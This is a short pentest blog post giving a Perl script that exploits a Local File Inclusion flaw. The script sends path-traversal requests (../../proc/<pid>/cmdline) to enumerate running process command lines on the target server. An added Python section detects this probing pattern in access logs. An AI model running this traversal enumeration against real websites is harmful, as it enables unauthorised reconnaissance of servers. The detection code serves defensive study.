Process command line enumeration using LFI

by on April 1, 2010

This week during a pentest I discovered a website vulnerable to Local File Inclusion. As I wanted to discover as much information as possible about the system, I decided to retrieve the running processes and the command lines used to execute these programs. With this I hoped to discover more services and paths in the system.

I wrote a very simple Perl program that can easily be adapted to other scenarios 🙂

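#!/usr/bin/perl -w
use strict;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
# Vulnerable endpoint; the traversal in the file parameter reaches /proc/
my $url = 'https://URL/load?file=../../proc/';

# Request /proc/<pid>/cmdline for each candidate PID
for (my $i = 0; $i < 9500; $i++) {
    my $response = $browser->get( $url . $i . "/cmdline" );
    # Print only non-empty responses
    if ($response->content !~ m/^$/) {
        print $i . " : " . $response->content . "\n";
    }
}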

Enjoy!
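
Seen from the server side, the loop above leaves a distinctive trail in the access log: one client requesting /proc/<pid>/cmdline for many different PIDs through the same parameter. The Python below is an added example, not part of the original post, that flags this pattern; the log lines, client addresses and the threshold of three distinct PIDs are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format); not from the original post.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2010:10:00:01 +0000] "GET /load?file=../../proc/1/cmdline HTTP/1.1" 200 11
203.0.113.7 - - [01/Apr/2010:10:00:01 +0000] "GET /load?file=../../proc/2/cmdline HTTP/1.1" 200 0
203.0.113.7 - - [01/Apr/2010:10:00:02 +0000] "GET /load?file=..%2F..%2Fproc%2F3%2Fcmdline HTTP/1.1" 200 0
203.0.113.7 - - [01/Apr/2010:10:00:02 +0000] "GET /load?file=../../proc/4/cmdline HTTP/1.1" 200 27
198.51.100.20 - - [01/Apr/2010:10:00:03 +0000] "GET /load?file=news.html HTTP/1.1" 200 5120
198.51.100.20 - - [01/Apr/2010:10:00:04 +0000] "GET /load?file=../../proc/self/cmdline HTTP/1.1" 200 40
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
PROC_RE = re.compile(r'(?:^|/)proc/(\d+|self)/cmdline\b')

def proc_cmdline_hits(log_text):
    """Map client IP -> set of /proc/<pid> targets requested via any query parameter."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        # parse_qsl percent-decodes values, so ..%2F..%2Fproc%2F3 is caught too.
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            pm = PROC_RE.search(value.replace("\\", "/"))
            if pm:
                hits[client].add(pm.group(1))
    return dict(hits)

def flag_enumeration(log_text, min_distinct_pids=3):
    """Return clients that probed at least min_distinct_pids numeric PIDs."""
    flagged = {}
    for client, targets in proc_cmdline_hits(log_text).items():
        pids = sorted(int(t) for t in targets if t.isdigit())
        if len(pids) >= min_distinct_pids:
            flagged[client] = pids
    return flagged

if __name__ == "__main__":
    for client, pids in flag_enumeration(SAMPLE_LOG).items():
        print(f"{client}: {len(pids)} distinct PIDs probed ({pids[0]}..{pids[-1]})")
```

A single request for /proc/self/cmdline stays below the threshold here, but any /proc path arriving in a file parameter is worth its own alert.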
